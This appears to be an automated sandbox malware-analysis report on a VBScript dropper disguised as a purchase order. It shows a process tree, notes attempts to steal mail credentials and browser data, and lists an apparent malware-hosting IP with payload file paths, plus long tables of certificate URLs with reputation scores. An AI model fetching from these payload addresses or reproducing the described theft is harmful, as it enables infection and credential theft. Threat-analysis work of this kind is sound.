33->72 74 Tries to steal Mail credentials (via file / registry access) 33->74 76 Tries to harvest and steal browser information (history, passwords, etc) 36->76 42 conhost.exe 40->42         started        44 reg.exe 1 1 40->44         started        process18

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              REVISED NEW ORDER 7936-2024.vbs8%ReversingLabsWin32.Dropper.Generic
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              bg.microsoft.map.fastly.net0%VirustotalBrowse
              paygateme.net19%VirustotalBrowse
              geoplugin.net4%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://ocsp.suscerte.gob.ve00%URL Reputationsafe
              https://go.microsoft.co0%URL Reputationsafe
              http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
              http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
              http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
              http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
              http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
              http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://87.121.105.1840%Avira URL Cloudsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.imvu.comta0%Avira URL Cloudsafe
              http://crl.postsignum.cz/crl/psrootqca4.crl020%URL Reputationsafe
              http://policy.camerfirma.com00%URL Reputationsafe
              http://policy.camerfirma.com00%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://ocsp.pki.gva.es00%URL Reputationsafe
              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://ca.mtin.es/mtin/ocsp00%URL Reputationsafe
              http://ca.mtin.es/mtin/ocsp00%URL Reputationsafe
              http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf00%URL Reputationsafe
              http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%URL Reputationsafe
              http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
              http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              http://www.defence.gov.au/pki00%Avira URL Cloudsafe
              https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
              https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
              http://www.globaltrust.info0=0%Avira URL Cloudsafe
              http://www.dnie.es/dpc00%URL Reputationsafe
              http://www.dnie.es/dpc00%URL Reputationsafe
              http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://ca.mtin.es/mtin/DPCyPoliticas00%URL Reputationsafe
              https://repository.tsp.zetes.com00%URL Reputationsafe
              https://repository.tsp.zetes.com00%URL Reputationsafe
              http://www.globaltrust.info00%URL Reputationsafe
              http://87.121.105.184/Udvejningernes.aaf0%Avira URL Cloudsafe
              http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
              http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
              https://www.catcert.net/verarrel0%URL Reputationsafe
              http://www.disig.sk/ca0f0%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://certs.oati.net/repository/OATICA2.crl00%URL Reputationsafe
              http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
              http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
              http://87.121.105.184/sviLEH127.bin0%Avira URL Cloudsafe
              http://www.quovadis.bm00%URL Reputationsafe
              http://www.quovadis.bm00%URL Reputationsafe
              http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
              http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
              http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
              http://www.accv.es000%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy-G200%URL Reputationsafe
              https://www.netlock.net/docs0%URL Reputationsafe
              https://www.netlock.net/docs0%URL Reputationsafe
              http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
              http://ocsp.ncdc.gov.sa00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl00%URL Reputationsafe
              http://crl2.postsignum.cz/crl/psrootqca4.crl010%URL Reputationsafe
              http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
              http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
              http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%URL Reputationsafe
              http://87.121.105.1843%VirustotalBrowse
              http://87.121.105.184/sviLEH127.bin18%VirustotalBrowse
              http://www.defence.gov.au/pki00%VirustotalBrowse
              http://87.121.105.184/Udvejningernes.aaf16%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalseunknown
              paygateme.net
              146.70.57.34
              truefalseunknown
              geoplugin.net
              178.237.33.50
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://87.121.105.184/Udvejningernes.aaffalse
              • 16%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://87.121.105.184/sviLEH127.binfalse
              • 18%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.certplus.com/CRL/class3.crl0wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.e-me.lv/repository0wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.imvu.comrwab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.acabogacia.org/doc0wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://crl.chambersign.org/chambersroot.crl0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ocsp.suscerte.gob.ve0wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://go.microsoft.copowershell.exe, 00000001.00000002.2624655236.000002B7C068E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.imvu.comtawab.exe, 0000000F.00000002.2473933419.000000000371D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.postsignum.cz/crl/psrootqca2.crl02wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://crl.dhimyotis.com/certignarootca.crl0wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0wscript.exe, 00000000.00000003.1623323054.000001ABE882A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623383639.000001ABE882D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623335324.000001ABE882B000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://87.121.105.184powershell.exe, 00000001.00000002.2525142597.000002B7A85E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2525142597.000002B7AA384000.00000004.00000800.00020000.00000000.sdmpfalse
                • 3%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.chambersign.org1wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.pkioverheid.nl/policies/root-policy0wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://repository.swisssign.com/0wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.nirsoft.netwab.exe, 0000000D.00000002.2478998922.0000000000113000.00000004.00000010.00020000.00000000.sdmpfalse
                    high
                    http://www.suscerte.gob.ve/lcr0#wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.ssc.lt/root-c/cacrl.crl0wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://postsignum.ttc.cz/crl/psrootqca2.crl0wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlwscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://ca.disig.sk/ca/crl/ca_disig.crl0wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.certplus.com/CRL/class3P.crl0wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623040678.000001ABE88C0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.comwab.exe, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      high
                      http://www.suscerte.gob.ve/dpc0wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.certeurope.fr/reference/root2.crl0wscript.exe, 00000000.00000003.1623646795.000001ABE682D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://www.certplus.com/CRL/class2.crl0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.disig.sk/ca/crl/ca_disig.crl0wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2319330594.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.defence.gov.au/pki0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.sk.ee/cps/0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.globaltrust.info0=wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://www.anf.eswscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.nirsoft.net/wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2525142597.000002B7A81D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2319330594.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.postsignum.cz/crl/psrootqca4.crl02wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://pki.registradores.org/normativa/index.htm0wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623040678.000001ABE88C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://policy.camerfirma.com0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.ssc.lt/cps03wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623115975.000001ABE889F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://ocsp.pki.gva.es0wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.anf.es/es/address-direccion.htmlwscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.anf.es/address/)1(0&wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmptrue
                                          • URL Reputation: malware
                                          unknown
                                          http://ca.mtin.es/mtin/ocsp0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://crl.ssc.lt/root-b/cacrl.crl0wscript.exe, 00000000.00000003.1623115975.000001ABE889F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://web.ncdc.gov.sa/crl/nrcacomb1.crl0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.certicamara.com/dpc/0Zwscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0Gwscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://go.micropowershell.exe, 00000001.00000002.2525142597.000002B7A96E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://wwww.certigna.fr/autorites/0mwscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.dnie.es/dpc0wscript.exe, 00000000.00000003.1623274472.000001ABE8848000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623235532.000001ABE8846000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.imvu.comwab.exe, wab.exe, 0000000F.00000002.2473933419.000000000371D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Iconpowershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://ca.mtin.es/mtin/DPCyPoliticas0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.anf.es/AC/ANFServerCA.crl0wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://repository.tsp.zetes.com0wscript.exe, 00000000.00000003.1623065876.000001ABE88A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.globaltrust.info0wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://certificates.starfieldtech.com/repository/1604wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://acedicom.edicomgroup.com/doc0wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.certplus.com/CRL/class3TS.crl0wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://crl.anf.es/AC/ANFServerCA.crl0wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.certeurope.fr/reference/pc-root2.pdf0wscript.exe, 00000000.00000003.1623646795.000001ABE682D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://ac.economia.gob.mx/last.crl0Gwscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE88A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.catcert.net/verarrelwscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.disig.sk/ca0fwscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.e-szigno.hu/RootCA.crlwscript.exe, 00000000.00000003.1624174488.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.sk.ee/juur/crl/0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://crl.chambersign.org/chambersignroot.crl0wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://crl.xrampsecurity.com/XGCA.crl0wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://certs.oati.net/repository/OATICA2.crl0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://crl.oces.trust2408.com/oces.crl0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.quovadis.bm0wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.google.com/accounts/serviceloginwab.exefalse
                                                                  high
                                                                  http://crl.ssc.lt/root-a/cacrl.crl0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://certs.oaticerts.com/repository/OATICA2.crlwscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://certs.oati.net/repository/OATICA2.crt0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.accv.es00wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.pkioverheid.nl/policies/root-policy-G20wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.netlock.net/docswscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.e-trust.be/CPS/QNcertswscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
